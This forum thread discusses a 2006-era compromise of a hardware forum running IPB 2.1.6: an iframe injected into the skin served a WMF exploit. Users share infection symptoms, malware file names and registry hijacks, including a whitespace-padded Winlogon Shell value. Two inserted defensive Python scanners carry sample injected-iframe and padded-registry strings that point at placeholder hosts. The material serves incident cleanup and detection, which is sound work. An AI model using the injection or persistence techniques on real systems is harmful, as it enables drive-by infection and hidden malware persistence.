Christer

Java start and file download


I have never seen this before:

When the forum main page opened, Java was launched and a file download started. I didn't give myself time to take notes on from where before I clicked to interrupt.

What's up? Is this a new thing or related to the spam issue?

Christer


After posting the above I went back to the start page of the forums and it took a long time to load. It said it was connecting to 81.95.153.241 (if I got it right).

Christer

Guest Eugene

Christer,

Thanks to you and others for pointing this out... unfortunately it seems something was inserted into the database that caused this to launch :(. We didn't start receiving reports about this until earlier today, however. We've given the database a good scrubbing and removed the offending references.

I'm so sorry about all the grief this is causing loyal readers. I'll continue to try and update folks if any new information arises.


Hello all--

Looks like someone gained access to the Invision Power Board control panel, probably using an SQL injection exploit affecting IPB 2.1.6 (Thanks to Ben Nickell for finding a reference to this).

Security bugs in general are unfortunately still common in software today. The announcement that Microsoft will be patching a record 26 security holes is not particularly inspiring in this regard.

It looks like this is what happened:

A script kiddie/spammer used the control panel to send out a mass mail as discussed in this thread. Fortunately, StorageReview.com users are far more savvy than the average internet user, so few likely installed the adware as suggested by the very obviously suspicious email.

"You[sic] in VIP club." Yeah. That's convincing.

Ad-aware and other free scanners will likely uninstall it for anyone affected.

Later, s/he ran the script again while we were still researching what happened and used the control panel to add an iframe to the forum skin. This made the forums request a download of a .WMF (Windows Metafile). I'm not sure why this was done since the WMF Windows flaw had been patched for ages. (see the Wikipedia article).

With or without virus scanning software, any system which has been on Windows Update since January, as well as any Windows 98, Windows ME, Mac, or Linux system, would be unaffected.

The forums technically could have been brought back up much sooner than they were, but we wanted to grep all database tables; scan the PHP, HTML, XML, JS, and perl files, beef up the firewall, scan the 200MB or so of logs, and generally have the time of our lives. We didn't even get the satisfaction of finding anything else, though I guess that's a good thing.

So, that was our week. How's yours been?

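The iframe injected into the forum skin and the "grep all database tables" step described above, as an added example that is not part of the original thread and not IPB's own code: a scanner that walks skin template text (or a row from a SQL dump, where quotes arrive backslash-escaped) and flags every remote-loading tag whose host is not on an allowlist, noting zero-size or hidden frames. The host 192.0.2.10, the allowlisted host cdn.example.com, the table name ibf_skin_templates and both sample strings are constructed placeholders, not data from the incident.

```python
import re
from urllib.parse import urlparse

# Tags whose src/data attribute makes the browser fetch remote content.
TAG_RE = re.compile(
    r"<(?P<tag>iframe|script|object|embed|img)\b(?P<attrs>[^>]*)>",
    re.IGNORECASE | re.DOTALL,
)
# Quotes may be backslash-escaped when the template is read out of a SQL dump.
QUOTE = r"(?:\\?[\"'])?"
SRC_RE = re.compile(r"\b(?:src|data)\s*=\s*" + QUOTE + r"(?P<url>[^\"'\s>\\]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*" + QUOTE + r"0\b|display\s*:\s*none|visibility\s*:\s*hidden",
    re.IGNORECASE,
)


def remote_host(url):
    """Hostname of an absolute or protocol-relative URL; None for a local path."""
    if url.startswith("//"):
        url = "http:" + url
    parsed = urlparse(url)
    return parsed.hostname if parsed.scheme in ("http", "https") else None


def find_injected(text, allowed_hosts):
    """Return the remote-loading tags in `text` whose host is not allowlisted."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for m in TAG_RE.finditer(text):
        attrs = m.group("attrs")
        src = SRC_RE.search(attrs)
        if not src:
            continue
        host = remote_host(src.group("url"))
        if host is None or host.lower() in allowed:
            continue  # served by the forum itself, or a known third party
        findings.append({
            "tag": m.group("tag").lower(),
            "host": host,
            "url": src.group("url"),
            "hidden": bool(HIDDEN_RE.search(attrs)),  # 0x0 or display:none frame
            "offset": m.start(),
        })
    return findings


# Constructed sample data (placeholder hosts, not indicators from the incident).
ALLOWED_HOSTS = ["cdn.example.com"]

SAMPLE_SKIN = """<div id="header"><img src="style_images/logo.gif" alt="logo"></div>
<script type="text/javascript" src="http://cdn.example.com/forum.js"></script>
<iframe src="http://192.0.2.10/counter.wmf" width="0" height="0" style="display:none"></iframe>
"""

# One row of a mysqldump of the skin table, quotes escaped (table name assumed).
SAMPLE_DUMP_ROW = r"""INSERT INTO ibf_skin_templates VALUES (3,'global_header','<iframe src=\"http://192.0.2.10/c.wmf\" width=\"0\" height=\"0\"></iframe>');"""


def scan_skin():
    return find_injected(SAMPLE_SKIN, ALLOWED_HOSTS)


def scan_dump_row():
    return find_injected(SAMPLE_DUMP_ROW, ALLOWED_HOSTS)


if __name__ == "__main__":
    for finding in scan_skin() + scan_dump_row():
        print(finding)
```

Run it against the rendered skin files and against the dump of every table that stores HTML (templates, announcements, signatures, posts); a hit whose host is not one you put there is the injection, and the `hidden` flag marks the variant that fetches a file without anything visible on the page.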

You know all of us would like to choke the crap out of the person who screwed with the site, but you gotta admit the members who caught it and the admin folks who fixed it were on the ball. Stuff happens, always will. :)


Like Eugene mentioned up above, I'm one of the savvy forum goers who knew better than to click that VIP status toolbar link.

And then yesterday, while visiting here, Kaspersky 6.0 saved my PC's *ss and mine ;-) by catching the malicious trojan scripts' installation.

Thank you Admins for taking care of this quickly and revising the security of this site!

Sorry, has to be said...

I'm glad I'm using a Mac. :P

Yeah, and I'm sure our webmaster is glad he's using Linux, but that didn't keep him from getting hacked.

Just remember to stay up to date on your patches. Seriously. Not just for the OS but for any software you use on it. If you look at things like BugTraq you'll find that layered software exploits and cross-platform attacks are becoming much more frequent. As the OSes become more secure, hackers will find other ways in, and the bad news is that those other ways often turn out to be cross-platform vulnerabilities.

Hello all--

Looks like someone gained access to the Invision Power Board control panel, probably using an SQL injection exploit affecting IPB 2.1.6 (Thanks to Ben Nickell for finding a reference to this).

[...]

This post is not particularly clear. Was SR running 2.1.6 when this exploit was used, and now you have updated to 2.1.7? Or is there a flaw in 2.1.7 also??? Disappointing in the lack of links to discussion of these problems, known already? But typical of SR's 'you don't need to know the details, if and when we get around to it' philosophy... why would we be more interested in the Wiki WMF description of an old problem, where's the link to the detailed explanation of the problem that was caused HERE?

I also wonder about "user group" in sivar's link to the other SRBG thread, other than mods/Admin, are not the majority of SR members of "group" "member", in which case the hijack of Admin level access means they would not need to 'manually' harvest e-mails, they could have gotten the lions share of the DB of group "member"...again, not very clear posting by sivar.

While we're at it, I thought I read some time just after the DB crash (accidental erasure) of 2002 that SR was co-located. If so, why can't you guys just put up a redirect to a simple page (instead of an announcement) explaining the reason for SR being down while maintenance is being done... instead of the boring Apache Redhat page we always get, which only indicates that SR is offline.... Do'h.

Sorry, has to be said...

I'm glad I'm using a Mac. :P

Yeah, but you also have a PC, don't you :).

Mac browsers are not immune to malicious javascripting (unless you turn that off in preferences, in which case many parts of sites will not work correctly/well), just Windows viruses. Javascripts can be used to harvest various kinds of information, more serious than just e-mail addy's.

Looks like someone gained access to the Invision Power Board control panel, probably using an SQL injection exploit affecting IPB 2.1.6 (Thanks to Ben Nickell for finding a reference to this).

[...]

I was one of the unlucky ones who tried to access the forums yesterday around 11:15 am EDT and found out the hard way that one of my office PCs wasn't up to date on patches, and that Symantec Antivirus 9 (the office standard, thanks) is only borderline useful. While the office's firewall and proxy servers limited data risk, it still took me some time to eradicate the resulting infection and stabilize the system.

If anyone else was similarly unfortunate, you'll find that in order to find and get rid of some of these files you will have to boot from a CD or other NTFS-capable boot media/device. The following was what I found, most of the files bearing a current time stamp but exceptions noted...

Removed from C:\WINDOWS\System32:

MZU_DRV.SYS

_mzu_stonedrv2.exe

~.EXE

NTOS.EXE (cleverly dated 8/4/04, haha)

Removed from C:\Program Files\Common Files\Microsoft Shared\Web Folders:

ibm00005.exe

ibm00004.dll

ibm00005.dll

ibm00006.dll

Removed from C:\WINDOWS\Prefetch:

IBM00001.EXE

_IBM00003.EXE

~.EXE

Removed C:\WINDOWS\System32\wsnpoem folder and:

audio.dll

video.dll

I believe there were a few things in %TEMP% too but I recall them being redundant to what's above.

Fixed the following registry keys:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe"

WAS "explorer.exe [many spaces...] C:\Program Files\Common Files\Microsoft Shared\Web Folders\ibm00005.exe"

(so that in REGEDIT it /looks like/ explorer.exe!!!)

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\WINDOWS\system32\userinit.exe,"

WAS "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,"

Finally, interestingly, a follow-up full system scan with SAV after all else was done, found some things in Windows' system restore folder that it chose to quarantine just now:

A0024392.exe

A0025313.sys

A0027385.exe

I'm poking around the system with a few more fun tools before I call this a closed matter but thought it would be nice to share the information ASAP in case anyone else is suffering the same problems.

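The padded Shell value and the extra Userinit entry in the post above, as an added example that is not part of the thread: a check that reads the two Winlogon values (from a live Windows system via winreg, or from sample strings) and reports whitespace padding plus any program beyond the one expected. The expected paths, the 60-space padding and the sample strings are reconstructed from the post for illustration, not copied from an infected system.

```python
import re
import sys

# Winlogon values that run at logon, with their expected contents on Windows XP
# (assumed defaults for the example; adjust for the system under review).
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
EXPECTED = {
    "Shell": ["explorer.exe"],
    "Userinit": [r"C:\WINDOWS\system32\userinit.exe"],
}


def split_entries(name, value):
    """Programs listed in a Winlogon value. Userinit is a comma-separated list;
    Shell names one program, so anything after the first token is extra."""
    if name == "Userinit":
        return [e.strip() for e in value.split(",") if e.strip()]
    return value.split(" ", 1)


def check_winlogon_value(name, raw):
    """Findings for one Winlogon value: hidden padding and unexpected programs."""
    findings = []
    collapsed = " ".join(raw.split())  # fold runs of whitespace to one space
    if collapsed != raw:
        extra = len(raw) - len(collapsed)
        findings.append("whitespace padding: %d extra spaces" % extra)
    expected = {e.lower() for e in EXPECTED[name]}
    for entry in split_entries(name, collapsed):
        if entry.lower() not in expected:
            findings.append("unexpected program: " + entry)
    return findings


def check_live_registry():
    """Check the values on a live Windows system; returns {} elsewhere."""
    if sys.platform != "win32":
        return {}
    import winreg
    results = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        for name in EXPECTED:
            value, _ = winreg.QueryValueEx(key, name)
            results[name] = check_winlogon_value(name, value)
    return results


# Constructed samples modelled on the values reported in the post above.
SAMPLE_VALUES = {
    "Shell": "explorer.exe" + " " * 60
             + r"C:\Program Files\Common Files\Microsoft Shared\Web Folders\ibm00005.exe",
    "Userinit": r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,",
}


def check_samples():
    return {name: check_winlogon_value(name, value)
            for name, value in SAMPLE_VALUES.items()}


if __name__ == "__main__":
    for name, findings in (check_live_registry() or check_samples()).items():
        print(name, "->", findings or "ok")
```

Collapsing the whitespace first is what defeats the regedit trick: the value column only shows the first few dozen characters, so a long run of spaces pushes the second executable out of view, while `raw.split()` sees straight through it.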
With or without virus scanning software, any system which has been on WindowsUpdate since January, as well as any Windows 98, Windows ME, Mac, or Linux system would be uneffected.

In theory... Both my XP boxes (main PC and a laptop) with all patches except the ones pushed out on Tuesday blue screened. My main box didn't have any AV software (for performance reasons), and the .wmf file opened in IrfanView. I was able to save an exact copy of the file with IrfanView's Copy feature, and scanned it over the network from my XP laptop, which has Trend Micro PC-cillin, which reported it as being infected. Feeling safe on the laptop, I tried opening the Storage Review forums on the laptop. PC-cillin reported a virus and said it quarantined it. Key word "said"... apparently it did execute in some way, not via IrfanView, but somehow, because within a few seconds the laptop bluescreened and would not get past the login without bluescreening. This laptop has a fresh install, less than a week old with all patches except for Tuesday's, and an updated PC-cillin antivirus scanner, yet the virus executed and killed it. Fortunately I had a Ghost backup and was able to get it going again quickly.

Meanwhile my main PC bluescreened while I was working on the laptop. I was able to log in and apply the MS patches and installed PC-cillin. I went to SR's forums again and got the warning from PC-cillin, but the machine stayed stable. I tried the site again on the laptop (after installing the latest patches), warning again and the laptop stayed stable.

So... it seems PC-cillin did NOT protect me from the virus. It seems the MS patches before this Tuesday did not protect me. And finally it seems the issue was only corrected by the latest MS patches pushed out this week! Argh...


Wow, I was here then and saw nothing unusual. But I run Firefox with no Java, no Flash, etc. as my main browser, leaving stuff like that installed for Internet Explorer only.


One of the viruses detected was EXPL_SSLICE.GEN, which is unknown to symantec, trendmicro, and google (only one hit, a listing of recent virus activity), is apparently near zero day and would explain what I experienced. The other ones detected are the well known TROJ_NASCENE.D and EXPL_WMF.GEN (detected on subsequent refreshes of SR's forums).

Edited by sixthofmay

Yeah, but you also have a PC, don't you :).

Mac browsers are not immune to malicious javascripting (unless you turn that off in preferences, in which case many parts of sites will not work correctly/well), just Windows viruses. Javascripts can be used to harvest various kinds of information, more serious than just e-mail addy's.

Yeah, not that I use my PC often. And most javascript exploits target Internet Explorer (even though by their nature, they COULD be cross-platform), making even Firefox users safer.

This one is one that I was 'safe' from because Safari won't try to open a WMF all on its own the way IE will.

I do keep my computers (Mac, PC, and various shades of Unix,) all patched up, because I know the OS isn't the only vulnerable point. (As was in this case. The forum software was hijacked, but I'm sure the underlying server was still 'secure'.)

And finally it seems the issue was only corrected by the latest MS patches pushed out this week!

I had just installed the latest batch of updates to WinXP but it didn't prevent the infection. Neither did Norton AntiVirus 2005 (also updated) prevent it, but it caught whatever was downloaded or executed and thus limited the damage. I never had a BSOD.

I have a single user account on my computer and all web applications are running under DropMyRights which limits the privileges for an administrator account. I have to use a different link to be able to use Windows Update which require administrator privileges. I believed that DMR would prevent this kind of installation but obviously not.

It seems like I was one of the first members to get hit and with the Image Viewer opening with each click for a new page and NAV trailing with a popup message, I kind of went into "Panic Lite". I had just installed the updates to WinXP and had created a new Ghost image. My backup HDD was running in the mobile rack and I was not sure that it was safe.

Christer

